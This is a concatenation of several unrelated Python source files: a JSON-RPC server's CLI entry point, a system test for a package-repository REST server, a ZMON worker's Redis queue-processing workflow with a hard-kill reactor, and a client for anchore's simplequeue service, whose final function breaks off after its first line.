    """Stop a server previously started with start_server(newprocess=True).

    Raises:
        RuntimeError: if no server is currently running (previously this
            raised a confusing AttributeError from ``None.terminate()``;
            the guard mirrors start_server()'s "already running" check).
    """
    global _proc
    if _proc is None:
        raise RuntimeError('server is not running')
    _proc.terminate()
    _proc = None
def process_async_cli(input_file_path, output_file_path, token):
    """Run a single JSON-RPC request read from *input_file_path* and write the
    response to *output_file_path*.  Returns 0 on success, 500 when the
    response carries an error."""
    exit_code = 0
    with open(input_file_path) as data_file:
        req = json.load(data_file)
    # Fill in protocol defaults so the request is always answerable
    # (an id is required, otherwise the call would be a notification).
    if 'version' not in req:
        req['version'] = '1.1'
    if 'id' not in req:
        req['id'] = str(_random.random())[2:]
    ctx = MethodContext(application.userlog)
    if token:
        user = application.auth_client.get_user(token)
        ctx['user_id'] = user
        ctx['authenticated'] = 1
        ctx['token'] = token
    if 'context' in req:
        ctx['rpc_context'] = req['context']
    ctx['CLI'] = 1
    ctx['module'], ctx['method'] = req['method'].split('.')
    prov_action = {'service': ctx['module'], 'method': ctx['method'],
                   'method_params': req['params']}
    ctx['provenance'] = [prov_action]
    resp = None
    try:
        resp = application.rpc_service.call_py(ctx, req)
    except JSONRPCError as jre:
        trace = jre.trace if hasattr(jre, 'trace') else None
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': jre.code,
                          'name': jre.message,
                          'message': jre.data,
                          'error': trace}
                }
    except Exception:
        trace = traceback.format_exc()
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': 0,
                          'name': 'Unexpected Server Error',
                          'message': 'An unexpected server error occurred',
                          'error': trace}
                }
    if 'error' in resp:
        exit_code = 500
    with open(output_file_path, "w") as f:
        f.write(json.dumps(resp, cls=JSONObjectEncoder))
    return exit_code
if __name__ == "__main__":
    # Two modes:
    #   <input.json> <output.json> [token-or-token-file]  -> run one async job
    #   [--host H] [--port P]                             -> serve forever
    if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
            os.path.isfile(sys.argv[1])):
        token = None
        if len(sys.argv) == 4:
            # Third argument may be a token file or the token itself.
            if os.path.isfile(sys.argv[3]):
                with open(sys.argv[3]) as token_file:
                    token = token_file.read()
            else:
                token = sys.argv[3]
        sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
    try:
        opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
    except GetoptError as err:
        # print help information and exit:
        print(str(err))  # will print something like "option -a not recognized"
        sys.exit(2)
    port = 9999
    host = 'localhost'
    for o, a in opts:
        if o == '--port':
            port = int(a)
        elif o == '--host':
            host = a
            print("Host set to %s" % host)
        else:
            assert False, "unhandled option"
    start_server(host=host, port=port)
#    print("Listening on port %s" % port)
#    httpd = make_server( host, port, application)
#
#    httpd.serve_forever()
|
run_system_test.py
|
"""
Copyright (c) 2016 Cisco and/or its affiliates.
This software is licensed to you under the terms of the Apache License, Version 2.0 (the "License").
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
The code, technical concepts, and all information contained herein, are the property of Cisco Technology, Inc.
and/or its affiliated entities, under various laws including copyright, international treaties, patent, and/or contract.
Any use of the material herein must be in accordance with the terms of the License.
All rights not expressly granted by the License are reserved.
Unless required by applicable law or agreed to separately in writing, software distributed under the License is
distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
Purpose: runs system tests on the rest server
"""
import json
import threading
import time
from package_repository_rest_server import PackageRepositoryRestServer
from package_repo_rest_client import PackageRepoRestClient
def run_system_tests(api_url):
    """End-to-end tests against a running package-repository REST server.

    :param api_url: base URL of the server under test.

    Bug fix: the client was previously hard-coded to
    "http://localhost:8888", silently ignoring *api_url*; it now uses the
    parameter (the existing caller passes the same URL, so behavior at the
    current call site is unchanged).
    """
    print("Running system tests for: " + api_url)
    test_package = "test_temp_sr_system_test-0.0.2.tar.gz"
    old_test_package = "test_temp_sr_system_test-0.0.1.tar.gz"
    # timestamps make each run's payloads unique
    old_test_package_data = "some older dummy data: " + str(time.time())
    test_package_data = "some dummy data: " + str(time.time())
    client = PackageRepoRestClient(api_url)
    # test a bad package in repository
    client.get_package("ThisPackageShouldReallyNotExist", [404])
    # testing putting a new package in the repository:
    client.put_package(test_package, test_package_data)
    # get the package data from the repository:
    downloaded_package_contents = client.get_package(test_package)
    # make sure that the package contents match what we just posted
    assert downloaded_package_contents == test_package_data
    # test package listing:
    client.put_package(old_test_package, old_test_package_data)
    package_list = client.get_package_list(recency=1)
    assert is_package_in_package_list(test_package, package_list)
    # older version of test package should not be in list with a recency of a single version
    assert not is_package_in_package_list(old_test_package, package_list)
    # get more versions of each package:
    package_list2 = client.get_package_list(recency=2)
    # older version of test package should be in list with a recency of a 2 versions
    assert is_package_in_package_list(old_test_package, package_list2)
    # finished testing:
    print("TESTS SUCCEEDED!!!")
def is_package_in_package_list(package_name, package_list):
    """
    :returns true if package_name exists in package_list
    """
    # Each list entry carries its recent versions; match on the file name.
    return any(
        version["file"] == package_name
        for entry in package_list
        for version in entry["latest_versions"]
    )
if __name__ == "__main__":
    # Spin up the REST server in a background thread, run the system tests
    # against it, and always shut it down afterwards.
    print("Configuring test server...")
    with open('../pr-config.json', 'r') as f:
        CONFIG = json.load(f)
    TEST_SERVER = PackageRepositoryRestServer(configuration=CONFIG)
    try:
        threading.Thread(target=lambda: TEST_SERVER.run()).start()
        TEST_SERVER.wait_for_server_to_start()
        run_system_tests("http://localhost:8888")
    finally:
        TEST_SERVER.stop()
|
workflow.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import json
import logging
import os
import sys
import threading
import time
from contextlib import contextmanager
from copy import deepcopy
from datetime import datetime, timedelta
from operator import itemgetter
from random import random
from traceback import format_exc
import opentracing
import requests
import setproctitle
import snappy
import tokens
import settings
from redis_context_manager import RedisConnHandler
from rpc_client import get_rpc_client
from tasks import check_and_notify, cleanup, configure_tasks, trial_run
from zmon_worker_monitor import eventloghttp
from zmon_worker_monitor.zmon_worker.common.tracing import extract_tracing_span
from zmon_worker_monitor.zmon_worker.common.utils import get_process_cmdline
logger = logging.getLogger(__name__)
# Blocking-pop timeout (seconds) for redis BLPOP in the worker loop.
TASK_POP_TIMEOUT = 5
# OpenTracing tag/operation names used while processing queued tasks.
OPENTRACING_TAG_QUEUE_RESULT = 'worker_task_result'
OPENTRACING_QUEUE_OPERATION = 'worker_task_processing'
OPENTRACING_TASK_EXPIRATION = 'worker_task_expire_time'
# How often (seconds) the sampling-rate config is refreshed.
SAMPLING_RATE_UPDATE_DURATION = 60
SAMPLING_RATE_ENTITY_ID = 'zmon-sampling-rate'
# Lazily-populated external configuration cache (see get_config()).
__config = None
# We manage uid tokens once when we import
tokens.manage('uid', ['uid'])
def get_sampling_rate_config(config, current_span):
    """
    Get sampling rate config from a ZMON entity or config vars.

    :param config: worker configuration mapping.
    :param current_span: OpenTracing span used to tag/log the lookup outcome.
    :return: dict with at least 'default_sampling' and 'critical_checks',
             possibly merged with the remote sampling-rate entity.

    Entity:
        {
            "id": "zmon-sampling-rate",
            "type": "zmon_config",
            "default_sampling": 100,
            "critical_checks": [13, 14, 19],
            "worker_sampling": {
                "account-1": 50,
                "account-2": 60,
                "account-3": 0
            }
        }
    """
    default_sampling = int(config.get('zmon.sampling.rate', 100))
    # Bug fix: 'zmon.critical.checks' may be absent, in which case the old
    # code called None.replace(...) and raised AttributeError.  Default to an
    # empty list; a comma-separated string is still split as before.
    critical_checks = config.get('zmon.critical.checks') or []
    if type(critical_checks) is not list:
        critical_checks = critical_checks.replace(' ', '').split(',')
    sampling_config = {
        'default_sampling': default_sampling,
        'critical_checks': critical_checks
    }
    # We try to get sampling rate entity!
    zmon_url = config.get('zmon.url')
    if not zmon_url:
        current_span.set_tag('sampling_entity_used', False)
    else:
        current_span.set_tag('sampling_entity_used', True)
        try:
            url = '{}/api/v1/entities/{}'.format(zmon_url, SAMPLING_RATE_ENTITY_ID)
            headers = {'Authorization': 'Bearer {}'.format(tokens.get('uid'))}
            resp = requests.get(url, headers=headers, timeout=2)
            resp.raise_for_status()
            entity = resp.json()
            sampling_config.update(entity)
        except Exception:
            # Entity fetch is best-effort; fall back to the config values.
            current_span.set_tag('sampling_entity_used', False)
            current_span.log_kv({'exception': format_exc()})
    return sampling_config
def get_config():
    """Lazily load and cache the external worker configuration."""
    global __config
    if __config is None:
        __config = settings.get_external_config()
    return __config
def flow_simple_queue_processor(queue='', **execution_context):
    '''
    Simple logic to connect to a redis queue, listen to messages, decode them and execute the tasks
    :param queue: (str) queue to connect to
    :param execution_context: (dict) other kwargs that may have been passed when worker was spawn
    :return:
    Some info to understand celery messages:
    1. An example of a celery message as first received (base64-encoded body shortened):
    ('zmon:queue:default',
    '{
        "body": "eyJleHBpcm...t9fQ==", "headers": {}, "content-type": "application/json",
        "properties": {
            "body_encoding": "base64",
            "correlation_id": "check-277-de_zalando:access-control-kit-1409826332.92",
            "reply_to": "abc5c87f-74eb-3570-a1cf-e426eaf91ca7",
            "delivery_info": {
                "priority": 0,
                "routing_key": "default",
                "exchange": "zmon"
            },
            "delivery_mode": 2,
            "delivery_tag": "94288433-cb4e-4d33-be29-c63e2bbce39a"
        },
        "content-encoding": "utf-8"}'
    )
    2. An example of the message['body'] after being base64-decoded (args list shortened):
    {
        u'utc': True,
        u'chord': None,
        u'args': [{u'check_id': 277, u'interval': 60, u'entity': {u'instance_type': u'zomcat', ...}, u'condition': u'>100', ...}],  # noqa
        u'retries': 0,
        u'expires': u'2014-09-04T10:27:32.919152+00:00',
        u'task': u'check_and_notify',
        u'callbacks': None,
        u'errbacks': None,
        u'timelimit': [90, 60],
        u'taskset': None,
        u'kwargs': {},
        u'eta': None,
        u'id': u'check-277-de_zalando:access-control-kit-1409826332.92'
    }
    '''
    # Task names this worker knows how to execute.
    known_tasks = {'check_and_notify': check_and_notify, 'trial_run': trial_run, 'cleanup': cleanup}
    # get configuration and configure tasks
    config = get_config()
    configure_tasks(config)
    logger.info('Connecting simple_queue_consumer to queue=%s, execution_context=%s', queue, execution_context)
    RedisConnHandler.configure(**dict(config))
    eventloghttp.set_target_host(config.get('eventlog.host', 'localhost'), config.get('eventlog.port', 8081))
    eventloghttp.enable_http(config.get('eventlog.http', False))
    reactor = FlowControlReactor.get_instance()
    conn_handler = RedisConnHandler.get_instance()
    expired_count = 0
    count = 0
    sampling_rate_last_updated = datetime.utcnow()
    sampling_config = None
    sampling_update_rate = int(config.get('zmon.sampling.update.rate', SAMPLING_RATE_UPDATE_DURATION))
    # Main worker loop: blocking-pop a task, decode it, process it. Errors
    # are logged and the loop continues; it never exits on its own.
    while True:
        try:
            with conn_handler as ch:
                r_conn = ch.get_healthy_conn()
                encoded_task = r_conn.blpop(queue, TASK_POP_TIMEOUT)
                if encoded_task is None:
                    raise ch.IdleLoopException('No task received')
                queue, msg = encoded_task
                # Payloads that don't start with '{' are snappy-compressed.
                if msg[:1] != '{':
                    msg = snappy.decompress(msg)
                msg_obj = json.loads(msg)
                # OpenTracing: picking up trace from scheduler
                trace = msg_obj.get('properties', {}).get('trace', {})
                span = extract_tracing_span(trace)
                span.set_operation_name(OPENTRACING_QUEUE_OPERATION)
                # Get sampling rates. We update every minute.
                if sampling_config is None or (
                        (datetime.utcnow() - sampling_rate_last_updated).seconds > sampling_update_rate):
                    try:
                        sampling_rate_last_updated = datetime.utcnow()
                        sampling_config = get_sampling_rate_config(config, span)
                        span.log_kv({'sampling_config': sampling_config})
                        span.set_tag('sampling_rate_updated', True)
                    except Exception:
                        # Best-effort refresh: keep the previous sampling config.
                        span.set_tag('sampling_rate_updated', False)
                        span.log_kv({'exception': format_exc()})
                with span:
                    try:
                        is_processed = process_message(
                            queue, known_tasks, reactor, msg_obj, current_span=span, sampling_config=sampling_config)
                        if is_processed:
                            span.set_tag(OPENTRACING_TAG_QUEUE_RESULT, 'success')
                        else:
                            span.set_tag(OPENTRACING_TAG_QUEUE_RESULT, 'expired')
                            expired_count += 1
                            if expired_count % 500 == 0:
                                logger.warning('expired tasks count: %s', expired_count)
                    except Exception:
                        span.set_tag(OPENTRACING_TAG_QUEUE_RESULT, 'error')
                        span.set_tag('error', True)
                        span.log_kv({'exception': format_exc()})
                count += 1
        except Exception:
            logger.exception('Exception in redis loop. Details: ')
            try:
                span = opentracing.tracer.start_span(operation_name='worker_redis_loop')
                with span:
                    span.set_tag('error', True)
                    span.log_kv({'exception': format_exc()})
            except Exception:
                pass
            time.sleep(5)  # avoid heavy log spam here
        # TODO: some exit condition on failure: maybe when number of consecutive failures > n ?
def process_message(queue, known_tasks, reactor, msg_obj, current_span, sampling_config=None):
    """
    Process and execute a task.

    :param queue: Name of the queue the task comes from
    :type queue: str
    :param known_tasks: Dictionary of tasks that processor knows how to work with
    :type known_tasks: dict
    :param reactor: Instance of FlowControlReactor
    :type reactor: FlowControlReactor
    :param msg_obj: Dictionary that contains the task to process
    :type msg_obj: dict
    :param current_span: Current OpenTracing span.
    :type current_span: opentracing.Span
    :param sampling_config: Dict holding all sampling rate info.
    :type sampling_config: dict
    :return: Return True if the message was processed successfully, False if it was discarded as expired
    :rtype: bool
    """
    # Decode the task body according to how the scheduler encoded it.
    msg_body = None
    body_encoding = msg_obj.get('properties', {}).get('body_encoding')
    if body_encoding == "nested":
        msg_body = msg_obj["body"]
    elif body_encoding == "base64":
        msg_body = json.loads(base64.b64decode(msg_obj['body']))
    elif body_encoding == "snappy":
        msg_body = json.loads(snappy.decompress(base64.b64decode(msg_obj['body'])))

    taskname = msg_body['task']
    func_args = msg_body['args']
    func_kwargs = msg_body['kwargs']
    timelimit = msg_body.get('timelimit')  # e.g. [90, 60] -> [hard, soft] limits in seconds
    t_hard, t_soft = timelimit

    current_span.set_tag('taskname', taskname)

    # we pass task metadata as a kwargs right now, later will be put in the function context by decorator
    task_context = {
        'queue': queue,
        'taskname': taskname,
        'delivery_info': msg_obj.get('properties', {}).get('delivery_info', {}),
        'task_properties': {
            'task': taskname,
            'id': msg_body.get('id', ''),
            'expires': msg_body.get('expires'),  # '2014-09-04T10:27:32.91915200:00'
            'timelimit': timelimit,  # [90, 60]
            'utc': msg_body.get('utc', True),
        },
    }

    # discard tasks that are expired if expire metadata comes with the message
    cur_time = datetime.utcnow() if task_context['task_properties']['utc'] else datetime.now()
    # 'expires' may carry a trailing 'Z' or '+HH:MM' offset that strptime can't parse; strip it.
    expire_time = datetime.strptime(
        msg_body.get('expires').replace('Z', '').rsplit('+', 1)[0], '%Y-%m-%dT%H:%M:%S.%f') \
        if msg_body.get('expires') else cur_time + timedelta(seconds=10)

    # check_id is only available when the first positional arg is the check-request dict.
    check_id = (msg_body['args'][0].get('check_id', 'xx') if len(msg_body['args']) > 0 and isinstance(
        msg_body['args'][0], dict) else 'XX')
    current_span.set_tag('check_id', check_id)

    if cur_time >= expire_time:
        current_span.set_tag(OPENTRACING_TASK_EXPIRATION, str(expire_time))
        # logger.warn() is a deprecated alias; use warning() with lazy %-style args.
        logger.warning(
            'Discarding task due to time expiration. cur_time: %s , expire_time: %s, check_id: %s, '
            'msg_body["expires"]=%s ---- msg_body=%s',
            cur_time, expire_time, check_id, msg_body.get('expires'), msg_body)
        return False

    # The reactor context arms the hard-kill timer for the duration of the task.
    with reactor.enter_task_context(taskname, t_hard, t_soft):
        known_tasks[taskname](*func_args, task_context=task_context, sampling_config=sampling_config)

    return True
class FlowControlReactor(object):
    """
    Implements a singleton object with a permanently running action loop, that can communicate with the
    parent process (ProcessController) to request certain actions or submit information about the health
    of this worker.
    Only implemented capability till now is a "Hard Kill" functionality that kicks in when a task is
    taking too long to complete. We use a context manager to signal when we enter or leave this mode of operations.
    Future capabilities may include periodical reports to the parent process about number of processed tasks,
    mean time spent by the N slowest running tasks. Also a soft kill feature.
    """

    # Singleton guard flags: direct construction is forbidden, use get_instance().
    _initialized = False
    _can_init = False
    _instance = None

    t_wait = 0.2  # pause between action-loop iterations (seconds)
    ping_timedelta = 30  # send ping data every X seconds

    # Template for the aggregated health data periodically sent to the parent via RPC.
    _ping_template = {
        'timestamp': None,
        'timedelta': None,
        'tasks_done': 0,
        'percent_idle': 0,
        'task_duration': 0.0,
    }

    # Shape of a single event record forwarded to the parent.
    _event_template = {
        'origin': '',
        'type': '',
        'body': '',
        'timestamp': 0,
        'repeats': 0,
    }
    _max_keep_events = 5000  # cap on buffered events to bound memory between flushes
    events_timedelta = 60  # send events every X seconds

    def __init__(self):
        """Build the reactor: RPC client to the parent, the action thread (not yet started), and buffers."""
        # self.task_agg_info = {}  # we could aggregate some info about how tasks are running in this worker
        assert not self._initialized and self._can_init, 'Call get_instance() to instantiate'
        self._initialized = True
        self._pid = os.getpid()
        self._rpc_client = get_rpc_client('http://{}:{}{}'.format(settings.RPC_SERVER_CONF['HOST'],
                                                                  settings.RPC_SERVER_CONF['PORT'],
                                                                  settings.RPC_SERVER_CONF['RPC_PATH']))
        # {thread_id: (taskname, t_hard, t_soft, tstart)} -- one running task per thread.
        self._current_task_by_thread = {}
        self.action_on = False
        self._thread = threading.Thread(target=self.action_loop)
        self._thread.daemon = True
        # Actions executed in order on every loop iteration.
        self._actions = (self.action_hard_kill, self.action_send_ping, self.action_send_events)
        self._ping_data = deepcopy(self._ping_template)
        self._ping_lock = threading.RLock()
        self._ping_idle_points = [0, 0]  # [num_idle_points, num_total_points]
        self._t_last_ping = time.time() - self.ping_timedelta * random()  # randomize ping start
        self._num_ping_sent = -1  # first ping interval is skipped (counter starts negative)
        self._event_list = []
        self._event_lock = threading.RLock()
        self._t_last_events = time.time() + self.events_timedelta * random()  # randomize event start

    @classmethod
    def get_instance(cls):
        """Return the process-wide singleton, creating it on first call."""
        if cls._instance is None:
            cls._can_init = True
            cls._instance = cls()
        return cls._instance

    @contextmanager
    def enter_task_context(self, taskname, t_hard, t_soft):
        """Arm the hard-kill timer while the wrapped task runs; record success or the raised exception."""
        self.task_received(taskname, t_hard, t_soft)
        try:
            yield self
        except Exception:
            self.task_ended(exc=format_exc())  # self.task_ended(exc=e)
            raise
        else:
            self.task_ended()

    def action_hard_kill(self):
        """ hard kill logic """
        # Iterate over a copy: the dict is mutated by task_received/task_ended from other call sites.
        for th_name, (taskname, t_hard, t_soft, ts) in self._current_task_by_thread.copy().items():
            if time.time() > ts + t_hard:
                msg = 'Hard kill request received for worker pid={}, task={}, t_hard={}, cmdline={}'.format(
                    self._pid, taskname, t_hard, get_process_cmdline(self._pid)
                )
                logger.warn(msg)
                self.add_event('FlowControlReactor.action_hard_kill', 'ACTION', msg)
                self._rpc_client.mark_for_termination(self._pid)  # rpc call to parent asking for a kill
                self._current_task_by_thread.pop(th_name, {})

    def action_send_ping(self):
        """Every ping_timedelta seconds, flush aggregated health data to the parent; otherwise sample idleness."""
        t_now = time.time()
        if t_now - self._t_last_ping >= self.ping_timedelta:
            with self._ping_lock:
                # Swap out the accumulators under the lock, then send outside contention.
                data = self._ping_data
                self._ping_data = deepcopy(self._ping_template)
                idle, total = tuple(self._ping_idle_points)
                self._ping_idle_points = [0, 0]
            data['timestamp'] = t_now
            data['timedelta'] = t_now - self._t_last_ping
            data['percent_idle'] = (idle * 100.0) / total if total > 0 else 0
            # send ping data
            if self._num_ping_sent >= 0:
                self._rpc_client.ping(self._pid, data)  # rpc call to send ping data to parent
            self._num_ping_sent += 1
            self._t_last_ping = t_now
        else:
            # update idle info
            with self._ping_lock:
                self._ping_idle_points[0] += 1 if not self._current_task_by_thread else 0  # idle
                self._ping_idle_points[1] += 1  # total

    def action_send_events(self):
        """Every events_timedelta seconds, deduplicate buffered events and push them to the parent."""
        t_now = time.time()
        if t_now - self._t_last_events >= self.events_timedelta:
            with self._event_lock:
                events = self._event_list
                self._event_list = []
            # eliminate repeated events, keep last timestamp (reverse iteration keeps the newest record)
            event_dict = {}
            for e in events[::-1]:
                key = (e['origin'], e['type'], e['body'])
                if key in event_dict:
                    event_dict[key]['repeats'] += e['repeats']
                else:
                    event_dict[key] = e
            events = sorted(event_dict.values(), key=itemgetter('timestamp'))
            if events:
                self._rpc_client.add_events(self._pid, events)  # rpc call to send events to parent
            self._t_last_events = t_now

    def add_event(self, origin, type, body, repeats=1):
        """Append one event to the buffer, trimming to the newest _max_keep_events entries."""
        with self._event_lock:
            self._event_list.append(dict(origin=origin, type=type, body=body, repeats=repeats, timestamp=time.time()))
            if len(self._event_list) > self._max_keep_events:
                self._event_list = self._event_list[-self._max_keep_events:]

    def action_loop(self):
        """Daemon-thread body: run every action each iteration, never letting one failure stop the loop."""
        while self.action_on:
            for action in self._actions:
                try:
                    action()
                except Exception:
                    self.add_event('FlowControlReactor.action_loop', 'ERROR', format_exc())
                    logger.exception('Scary Error in FlowControlReactor.action_loop(): ')
            time.sleep(self.t_wait)

    def start(self):
        """Start the background action loop."""
        self.action_on = True
        self._thread.start()

    def stop(self):
        """Signal the action loop to end on its next iteration (no join)."""
        self.action_on = False

    def task_received(self, taskname, t_hard, t_soft):
        # this sets a timer for this task, there is only one task per thread, and right now only main thread produce
        # NOTE(review): currentThread()/getName() are deprecated aliases of current_thread()/name
        self._current_task_by_thread[threading.currentThread().getName()] = (taskname, t_hard, t_soft, time.time())

    def task_ended(self, exc=None):
        """Disarm the timer for the current thread; update ping stats on success or record an error event."""
        # delete the task from the list
        task_detail = self._current_task_by_thread.pop(threading.currentThread().getName(), ())
        if not exc:
            # update ping data
            with self._ping_lock:
                self._ping_data['tasks_done'] += 1
                if len(list(task_detail)) >= 4:
                    self._ping_data['task_duration'] += time.time() - list(task_detail)[3]
        else:
            # register error event
            self.add_event('FlowControlReactor.task_ended', 'ERROR', str(exc))
def start_worker_for_queue(flow='simple_queue_processor', queue='zmon:queue:default', **execution_context):
    """
    Starting execution point to the workflows.

    :param flow: Name of the workflow to run; must be a key of known_flows.
    :param queue: Redis queue name to consume from.
    :param execution_context: Extra keyword arguments forwarded to the flow function.
    """
    known_flows = {'simple_queue_processor': flow_simple_queue_processor}
    if flow not in known_flows:
        # Fix: logger.exception() outside an except block logs a misleading
        # 'NoneType: None' traceback; use error() with lazy %-style args instead.
        logger.error('Bad role: %s', flow)
        sys.exit(1)

    logger.info('Starting worker with pid=%s, flow type: %s, queue: %s, execution_context: %s', os.getpid(), flow,
                queue, execution_context)
    setproctitle.setproctitle('zmon-worker {} {}'.format(flow, queue))

    # start Flow Reactor here
    FlowControlReactor.get_instance().start()

    exit_code = 0
    try:
        known_flows[flow](queue=queue, **execution_context)
    except (KeyboardInterrupt, SystemExit):
        logger.warning('Caught user signal to stop consumer: finishing!')
    except Exception:
        logger.exception('Exception in start_worker(). Details: ')
        exit_code = 2
    finally:
        # Stop the reactor even on failure so the daemon loop winds down.
        FlowControlReactor.get_instance().stop()
        sys.exit(exit_code)
|
simplequeue.py
|
import json
import threading
import time
from anchore_engine.clients.services import http
from anchore_engine.subsys import logger
from anchore_engine.utils import get_threadbased_id
from anchore_engine.clients.services.internal import InternalServiceClient
import retrying
class LeaseUnavailableError(Exception):
    """Raised when a lease is currently held by another thread and was not freed within the timeout."""
    pass
class LeaseAcquisitionFailedError(Exception):
    """Raised when lease acquisition fails due to errors, rather than the lease simply being held elsewhere."""
    pass
class SimpleQueueClient(InternalServiceClient):
    """Thin HTTP client for the anchore 'simplequeue' internal service: queue CRUD plus lease operations."""

    __service__ = 'simplequeue'

    def get_queues(self):
        """List all queues known to the service."""
        return self.call_api(http.anchy_get, '/queues')

    def qlen(self, name):
        """Return the number of messages currently in queue *name* as an int."""
        resp = self.round_robin_call_api(http.anchy_get, 'queues/{queue}/qlen', path_params={'queue': name})
        return int(resp)

    def enqueue(self, name, inobj, qcount=0, forcefirst=False):
        """Push *inobj* (JSON-serialized) onto queue *name*; forcefirst puts it at the head."""
        return self.round_robin_call_api(http.anchy_post, 'queues/{queue}', path_params={'queue': name}, query_params={'qcount': str(qcount), 'forcefirst': str(forcefirst)}, body=json.dumps(inobj))

    def delete_message(self, name, receipt_handle):
        """Delete the in-flight message identified by *receipt_handle* from queue *name*."""
        return self.round_robin_call_api(http.anchy_delete, path='queues/{queue}', path_params={'queue': name}, query_params={'receipt_handle': receipt_handle})

    def is_inqueue(self, name, inobj):
        """Check whether an equal message object is already present in queue *name*."""
        return self.round_robin_call_api(http.anchy_post, path='queues/{queue}/is_inqueue', path_params={'queue': name}, body=json.dumps(inobj))

    def dequeue(self, name, visibility_timeout=0, max_wait_seconds=0):
        """Pop a message from queue *name*, hiding it from other consumers for *visibility_timeout* seconds."""
        return self.round_robin_call_api(http.anchy_get, 'queues/{queue}', path_params={'queue': name}, query_params={'wait_max_seconds': max_wait_seconds, 'visibility_timeout': visibility_timeout})

    def update_message_visibility_timeout(self, name, receipt_handle, visibility_timeout):
        """Extend the visibility timeout of an in-flight message (keep-alive while processing)."""
        return self.round_robin_call_api(http.anchy_put, 'queues/{queue}', path_params={'queue': name}, query_params={'receipt_handle': receipt_handle, 'visibility_timeout': visibility_timeout})

    def create_lease(self, lease_id):
        """Create a new named lease record."""
        return self.round_robin_call_api(http.anchy_post, 'leases', query_params={'lease_id': lease_id})

    def list_leases(self):
        """List all lease records."""
        return self.round_robin_call_api(http.anchy_get, 'leases')

    def describe_lease(self, lease_id):
        """Fetch the state of a single lease."""
        return self.round_robin_call_api(http.anchy_get, 'leases/{lease_id}', path_params={'lease_id': lease_id})

    def acquire_lease(self, lease_id, client_id, ttl):
        """Try to acquire the lease for *client_id* with the given ttl (seconds)."""
        return self.round_robin_call_api(http.anchy_get, 'leases/{lease_id}/acquire', path_params={'lease_id': lease_id}, query_params={'client_id': client_id, 'ttl': ttl})

    def release_lease(self, lease_id, client_id, epoch):
        """Release the lease; *epoch* guards against releasing someone else's newer acquisition."""
        return self.round_robin_call_api(http.anchy_get, 'leases/{lease_id}/release', path_params={'lease_id': lease_id}, query_params={'client_id': client_id, 'epoch': epoch})

    def refresh_lease(self, lease_id, client_id, epoch, ttl):
        """Reset the lease ttl for the current holder (keep-alive)."""
        return self.round_robin_call_api(http.anchy_put, 'leases/{lease_id}/ttl', path_params={'lease_id': lease_id}, query_params={'client_id': client_id, 'ttl': ttl, 'epoch': epoch})
def run_target_with_queue_ttl(user_auth, queue, visibility_timeout, target, max_wait_seconds=0, autorefresh=True, retries=1, backoff_time=0, *args, **kwargs):
    """
    Run a target function with the message pulled from the queue. If autorefresh=True, then run target as a thread and periodically check
    for completion, updating the message visibility timeout to keep it fresh until the thread completes.

    The function passed as target should expect the message object as the first argument, with *args appended after in the arg list.

    :param user_auth: (account, password) tuple used to build the queue client
    :param queue: queue name to poll
    :param visibility_timeout: seconds the dequeued message stays hidden from other consumers
    :param target: callable run in a worker thread with the message as first positional arg
    :param max_wait_seconds: long-poll wait for the dequeue call
    :param autorefresh: if True, keep extending the message visibility while target runs
    :param retries: dequeue retry attempts
    :param backoff_time: incremental backoff (seconds) between dequeue retries
    :param args: extra positional args appended after the message
    :param kwargs: keyword args forwarded to target
    :return: True when the queue was empty; otherwise None
    """
    client = SimpleQueueClient(as_account=user_auth[0], user=user_auth[0], password=user_auth[1])

    @retrying.retry(stop_max_attempt_number=retries, wait_incrementing_start=0, wait_incrementing_increment=backoff_time*1000)
    def get_msg():
        logger.debug("Checking queue {} for message with vis timeout {}".format(queue, visibility_timeout))
        return client.dequeue(queue, max_wait_seconds=max_wait_seconds, visibility_timeout=visibility_timeout)

    qobj = get_msg()
    logger.debug('Got msg: {}'.format(qobj))

    if not qobj:
        logger.debug("Got empty message from queue - nothing to do")
        return True

    receipt_handle = qobj.get('receipt_handle')
    msg_id = qobj.get('id')
    if not receipt_handle:
        raise Exception('No receipt handle found in queue message: {}'.format(qobj))

    try:
        # Relies upon the queue configuration of 1 outstanding message (inflight) at a time for serialization across hosts
        t = time.time()
        # Message becomes the first positional argument of target.
        args = tuple([qobj] + list(args))
        task = threading.Thread(target=target, args=args, kwargs=kwargs)
        task.start()
        if autorefresh:
            # Run the task thread and monitor it, refreshing the task lease as needed.
            # Fix: Thread.isAlive() was removed in Python 3.9; use is_alive().
            while task.is_alive():
                # If we're halfway to the timeout, refresh to have a safe buffer
                if time.time() - t > (visibility_timeout / 2):
                    # refresh the visibility timeout, with up to 3 attempts
                    for i in range(3):
                        try:
                            resp = client.update_message_visibility_timeout(name=queue, receipt_handle=receipt_handle, visibility_timeout=visibility_timeout)
                            if resp:
                                t = time.time()
                                logger.debug('Msg with handle {} refreshed with new expiration: {}'.format(receipt_handle, resp))
                                break
                        except Exception:
                            logger.exception('Error updating visibility timeout {}'.format(receipt_handle))
                    else:
                        # for/else: all retries exhausted without a break
                        logger.warning('Visibility refresh failed to succeed after retries. Msg {} may be replayed due to timeout'.format(msg_id))
                task.join(timeout=1)
        else:
            # Just wait for thread to complete
            task.join()
    except Exception as err:
        logger.warning("failed to process task this cycle: " + str(err))
    finally:
        # Always delete the message. Other handlers will ensure things are queued ok.
        client.delete_message(queue, receipt_handle)
def run_target_with_lease(user_auth, lease_id, target, ttl=60, client_id=None, autorefresh=True, *args, **kwargs):
    """
    Run a handler within the context of a lease that is auto-refreshed as long as the handler runs.

    Uses a thread for the handler and a monitor to watch state and update the lease ttl.

    The leases are fairly slow to actuate, so expect to use this mechanism for longer running tasks where the lease duration should be > 10 sec

    :param user_auth: (account, password) tuple used to build the queue client
    :param lease_id: name of the lease to acquire
    :param target: callable run in a worker thread while the lease is held
    :param ttl: lease time-to-live in seconds
    :param client_id: lease holder id; defaults to a thread-based id
    :param autorefresh: if True, keep refreshing the lease ttl while target runs
    :param args: positional args forwarded to target
    :param kwargs: keyword args forwarded to target
    :raises LeaseUnavailableError: when another holder owns the lease
    :raises LeaseAcquisitionFailedError: when acquisition itself errors out
    """
    handler_thread = threading.Thread(target=target, args=args, kwargs=kwargs)
